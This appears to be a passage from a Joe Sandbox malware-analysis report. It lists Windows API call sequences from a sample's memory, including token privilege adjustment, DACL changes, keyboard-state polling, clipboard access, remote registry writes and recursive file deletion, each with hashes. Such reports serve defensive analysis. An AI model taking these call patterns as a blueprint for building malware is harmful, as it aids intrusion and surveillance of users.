                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 4125248594-2988720461
                                                                                                                • Opcode ID: 1b49921f372d8fb2c244cdee00ce4fae75f4eb5794ff5f8102e5e1d1154a5fd6
                                                                                                                • Instruction ID: f8c80c5baa66d713a21e3d6ddb5706783f568c3bbb74918dd8ada6492b5de075
                                                                                                                • Opcode Fuzzy Hash: 1b49921f372d8fb2c244cdee00ce4fae75f4eb5794ff5f8102e5e1d1154a5fd6
                                                                                                                • Instruction Fuzzy Hash: 95317271B5531CBAEB216B619C49FBF7E6CEB44B50F104029FA05EA1D1CAB05D40BAA1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009387E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0093882B
                                                                                                                  • Part of subcall function 009387E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00938858
                                                                                                                  • Part of subcall function 009387E1: GetLastError.KERNEL32 ref: 00938865
                                                                                                                • _memset.LIBCMT ref: 00938353
                                                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 009383A5
                                                                                                                • CloseHandle.KERNEL32(?), ref: 009383B6
                                                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009383CD
                                                                                                                • GetProcessWindowStation.USER32 ref: 009383E6
                                                                                                                • SetProcessWindowStation.USER32(00000000), ref: 009383F0
                                                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0093840A
                                                                                                                  • Part of subcall function 009381CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00938309), ref: 009381E0
                                                                                                                  • Part of subcall function 009381CB: CloseHandle.KERNEL32(?,?,00938309), ref: 009381F2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                • String ID: $default$winsta0
                                                                                                                • API String ID: 2063423040-1027155976
                                                                                                                • Opcode ID: 309e90338ff03da9bfa46db338ecc5c5848d6cb9999df63a90ea8ff1028b93e7
                                                                                                                • Instruction ID: 906978e114f24cfd2b5735f260aba5614a9fdfb5ee6bc4d7229634606edf167f
                                                                                                                • Opcode Fuzzy Hash: 309e90338ff03da9bfa46db338ecc5c5848d6cb9999df63a90ea8ff1028b93e7
                                                                                                                • Instruction Fuzzy Hash: 0B8148B1914209AFDF119FA4DC49AEFBBB9FF04304F1441A9F911A62A1DB718E14DF20
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0094C78D
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0094C7E1
                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0094C806
                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0094C81D
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0094C844
                                                                                                                • __swprintf.LIBCMT ref: 0094C890
                                                                                                                • __swprintf.LIBCMT ref: 0094C8D3
                                                                                                                  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
                                                                                                                • __swprintf.LIBCMT ref: 0094C927
                                                                                                                  • Part of subcall function 00903698: __woutput_l.LIBCMT ref: 009036F1
                                                                                                                • __swprintf.LIBCMT ref: 0094C975
                                                                                                                  • Part of subcall function 00903698: __flsbuf.LIBCMT ref: 00903713
                                                                                                                  • Part of subcall function 00903698: __flsbuf.LIBCMT ref: 0090372B
                                                                                                                • __swprintf.LIBCMT ref: 0094C9C4
                                                                                                                • __swprintf.LIBCMT ref: 0094CA13
                                                                                                                • __swprintf.LIBCMT ref: 0094CA62
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                • API String ID: 3953360268-2428617273
                                                                                                                • Opcode ID: 563078930e36f9b988a95bbe3137be5eb3779f68c4ea647388fcc64e12a0dd23
                                                                                                                • Instruction ID: 994f5e733ae9fb6f35c3df8f7a95de1ea764f63d0dfeb2ab81e4da3d06f422bf
                                                                                                                • Opcode Fuzzy Hash: 563078930e36f9b988a95bbe3137be5eb3779f68c4ea647388fcc64e12a0dd23
                                                                                                                • Instruction Fuzzy Hash: 41A14EB1508244AFC710EF99C886DAFB7ECFF86704F400929F595C6191EA71DA08CB63
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0094EFB6
                                                                                                                • _wcscmp.LIBCMT ref: 0094EFCB
                                                                                                                • _wcscmp.LIBCMT ref: 0094EFE2
                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 0094EFF4
                                                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 0094F00E
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0094F026
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0094F031
                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0094F04D
                                                                                                                • _wcscmp.LIBCMT ref: 0094F074
                                                                                                                • _wcscmp.LIBCMT ref: 0094F08B
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0094F09D
                                                                                                                • SetCurrentDirectoryW.KERNEL32(00998920), ref: 0094F0BB
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0094F0C5
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0094F0D2
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0094F0E4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 1803514871-438819550
                                                                                                                • Opcode ID: 6dfa18c54dca8eb0277fff793147bd572cf6607521be643a94ed3713419c3aa4
                                                                                                                • Instruction ID: 5bf0b2f89c0a22b26fc655d40c82ef1a23aee8fb758c0275cb07b76ec6dd1a72
                                                                                                                • Opcode Fuzzy Hash: 6dfa18c54dca8eb0277fff793147bd572cf6607521be643a94ed3713419c3aa4
                                                                                                                • Instruction Fuzzy Hash: 0A31D33250521A6EDF14DFB4EC68EEE77ACAF89364F10417AF814E20A1DB70DA44DE61
                                                                                                                APIs
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00960953
                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,0096F910,00000000,?,00000000,?,?), ref: 009609C1
                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00960A09
                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00960A92
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00960DB2
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00960DBF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$ConnectCreateRegistryValue
                                                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                • API String ID: 536824911-966354055
                                                                                                                • Opcode ID: e811ae5efc99df3f84124bc173f83700d7ca58120d458b775aa627f123821dcf
                                                                                                                • Instruction ID: db01868444550494d76516b020bc5a4bfc1a51df1e24540509dbafa76837c724
                                                                                                                • Opcode Fuzzy Hash: e811ae5efc99df3f84124bc173f83700d7ca58120d458b775aa627f123821dcf
                                                                                                                • Instruction Fuzzy Hash: 2E025E756006519FCB14DF19C895E2AB7E5FF89314F04856DF8999B3A2CB74EC01CB82
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0094F113
                                                                                                                • _wcscmp.LIBCMT ref: 0094F128
                                                                                                                • _wcscmp.LIBCMT ref: 0094F13F
                                                                                                                  • Part of subcall function 00944385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009443A0
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0094F16E
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0094F179
                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0094F195
                                                                                                                • _wcscmp.LIBCMT ref: 0094F1BC
                                                                                                                • _wcscmp.LIBCMT ref: 0094F1D3
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0094F1E5
                                                                                                                • SetCurrentDirectoryW.KERNEL32(00998920), ref: 0094F203
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0094F20D
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0094F21A
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0094F22C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 1824444939-438819550
                                                                                                                • Opcode ID: b363e12834daf7bad62ccd090d8e30701ed58b800e72e2141e3f30881a6c396c
                                                                                                                • Instruction ID: a91ab42314b5c9e8b7fb7dc4323222f2e70e6e502180ed721c56c744a475f622
                                                                                                                • Opcode Fuzzy Hash: b363e12834daf7bad62ccd090d8e30701ed58b800e72e2141e3f30881a6c396c
                                                                                                                • Instruction Fuzzy Hash: 8631033650521A6EDF20AFB4EC68FEE77AC9F89364F100175F824E20A0DBB0DE45CA54
                                                                                                                APIs
                                                                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0094A20F
                                                                                                                • __swprintf.LIBCMT ref: 0094A231
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0094A26E
                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0094A293
                                                                                                                • _memset.LIBCMT ref: 0094A2B2
                                                                                                                • _wcsncpy.LIBCMT ref: 0094A2EE
                                                                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0094A323
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0094A32E
                                                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 0094A337
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0094A341
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
• String ID: :$\$\??\%s
• API String ID: 2733774712-3457252023
• Opcode ID: 3599c6266e44af790aa60308f5d45127372c921125baca21cfe6044f26e35bf7
• Instruction ID: 05cd545d2a21c737ab94659d2c7d947648455903ae532ffd5f259422aa393026
• Opcode Fuzzy Hash: 3599c6266e44af790aa60308f5d45127372c921125baca21cfe6044f26e35bf7
• Instruction Fuzzy Hash: 3B31C7B1944109ABDB21DFA0DC49FEB37BCEF89740F1041BAF518D6160E7B096449B65
APIs
  • Part of subcall function 00938202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0093821E
  • Part of subcall function 00938202: GetLastError.KERNEL32(?,00937CE2,?,?,?), ref: 00938228
  • Part of subcall function 00938202: GetProcessHeap.KERNEL32(00000008,?,?,00937CE2,?,?,?), ref: 00938237
  • Part of subcall function 00938202: HeapAlloc.KERNEL32(00000000,?,00937CE2,?,?,?), ref: 0093823E
  • Part of subcall function 00938202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00938255
  • Part of subcall function 0093829F: GetProcessHeap.KERNEL32(00000008,00937CF8,00000000,00000000,?,00937CF8,?), ref: 009382AB
  • Part of subcall function 0093829F: HeapAlloc.KERNEL32(00000000,?,00937CF8,?), ref: 009382B2
  • Part of subcall function 0093829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00937CF8,?), ref: 009382C3
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00937D13
• _memset.LIBCMT ref: 00937D28
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00937D47
• GetLengthSid.ADVAPI32(?), ref: 00937D58
• GetAce.ADVAPI32(?,00000000,?), ref: 00937D95
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00937DB1
• GetLengthSid.ADVAPI32(?), ref: 00937DCE
• GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00937DDD
• HeapAlloc.KERNEL32(00000000), ref: 00937DE4
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 00937E05
• CopySid.ADVAPI32(00000000), ref: 00937E0C
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00937E3D
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00937E63
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00937E77
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
• String ID:
• API String ID: 3996160137-0
• Opcode ID: 81c2a938ed68fce5d90bf070f71321bbd3c671031672dad858d3685093c2e5ca
• Instruction ID: 3fb69a10956afbca9746349bc21818cee60f343a067d5d32be3105887dd4199f
• Opcode Fuzzy Hash: 81c2a938ed68fce5d90bf070f71321bbd3c671031672dad858d3685093c2e5ca
• Instruction Fuzzy Hash: C5612DB1904209BFDF209FA4EC45AAEBB79FF48700F048169F915A62A1DB719E05DF60
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID:
• String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
• API String ID: 0-4052911093
• Opcode ID: 3632221e0b626c59a9cab286fcd3344dae426ab4ae291134810a8edf02111614
• Instruction ID: c9ebdac390d01223883e77ac6373eec0ccc96978c942da3087708df550395b63
• Opcode Fuzzy Hash: 3632221e0b626c59a9cab286fcd3344dae426ab4ae291134810a8edf02111614
• Instruction Fuzzy Hash: DC725F75E00219DBDB24CF68C8817BEB7B5FF44710F14826AE959EB291EB349981CF90
APIs
• GetKeyboardState.USER32(?), ref: 00940097
• SetKeyboardState.USER32(?), ref: 00940102
• GetAsyncKeyState.USER32(000000A0), ref: 00940122
• GetKeyState.USER32(000000A0), ref: 00940139
• GetAsyncKeyState.USER32(000000A1), ref: 00940168
• GetKeyState.USER32(000000A1), ref: 00940179
• GetAsyncKeyState.USER32(00000011), ref: 009401A5
• GetKeyState.USER32(00000011), ref: 009401B3
• GetAsyncKeyState.USER32(00000012), ref: 009401DC
• GetKeyState.USER32(00000012), ref: 009401EA
• GetAsyncKeyState.USER32(0000005B), ref: 00940213
• GetKeyState.USER32(0000005B), ref: 00940221
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: fc9533ea7da73344aa8215ed4305e02815b13583e0114656255d3f349616da4e
• Instruction ID: f3694470d966898288ad1245aab57a717aeaa90c539b94fba79b3b480813a1b2
• Opcode Fuzzy Hash: fc9533ea7da73344aa8215ed4305e02815b13583e0114656255d3f349616da4e
• Instruction Fuzzy Hash: E151BF2090878859FB35DB708855FEABFB89F81380F08459ED6C6575C3D6B49B8CCB51
APIs
  • Part of subcall function 00960E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0095FDAD,?,?), ref: 00960E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009604AC
  • Part of subcall function 008E9837: __itow.LIBCMT ref: 008E9862
  • Part of subcall function 008E9837: __swprintf.LIBCMT ref: 008E98AC
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0096054B
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009605E3
• RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00960822
• RegCloseKey.ADVAPI32(00000000), ref: 0096082F
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
• String ID:
• API String ID: 1240663315-0
• Opcode ID: 986a5843d92dff5dd60843f4bda4e64b714bf3169dfdefe5e0656d4374f8cb6c
• Instruction ID: c174ec1bf48a43c36aa4af438d973aa7b501aa3f29031f6531bb626b53303304
• Opcode Fuzzy Hash: 986a5843d92dff5dd60843f4bda4e64b714bf3169dfdefe5e0656d4374f8cb6c
• Instruction Fuzzy Hash: 1DE14E71604214AFCB14DF29C895E6BBBE8FF89314F04896DF54ADB261DA31ED01CB92
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
• Opcode ID: b8d0afe631d9d8befefa1aba7da5be72620468320ea08b01a68106b7a3b18831
• Instruction ID: 75ad10fc8d50aea0fb0a3a76cabcb7c40e977733d1a017d90c0773ba6643b455
• Opcode Fuzzy Hash: b8d0afe631d9d8befefa1aba7da5be72620468320ea08b01a68106b7a3b18831
• Instruction Fuzzy Hash: E221D135208614AFDB00AF25EC19B6D7BA8FF55711F00802AFD46DB2B1CBB0AC40DB95
APIs
  • Part of subcall function 008E4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E4743,?,?,008E37AE,?), ref: 008E4770
  • Part of subcall function 00944A31: GetFileAttributesW.KERNEL32(?,0094370B), ref: 00944A32
• FindFirstFileW.KERNEL32(?,?), ref: 009438A3
• DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0094394B
• MoveFileW.KERNEL32(?,?), ref: 0094395E
• DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0094397B
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0094399D
• FindClose.KERNEL32(00000000,?,?,?,?), ref: 009439B9
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
• String ID: \*.*
• API String ID: 4002782344-1173974218
• Opcode ID: c1a94991c48f48ac12794b69c9073740b984b670b0407dec5bfcc94e778d985a
• Instruction ID: a02b9569cc1fbbade1dc70fa271a41a615feb64d32c6146a17877fc1c390aaac
• Opcode Fuzzy Hash: c1a94991c48f48ac12794b69c9073740b984b670b0407dec5bfcc94e778d985a
• Instruction Fuzzy Hash: 5B517F3180518CAACF05FBB5D992DEDB778BF16304F604069E406B7192EB716F09CB62
APIs
  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
• FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0094F440
• Sleep.KERNEL32(0000000A), ref: 0094F470
• _wcscmp.LIBCMT ref: 0094F484
• _wcscmp.LIBCMT ref: 0094F49F
• FindNextFileW.KERNEL32(?,?), ref: 0094F53D
• FindClose.KERNEL32(00000000), ref: 0094F553
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                • String ID: *.*
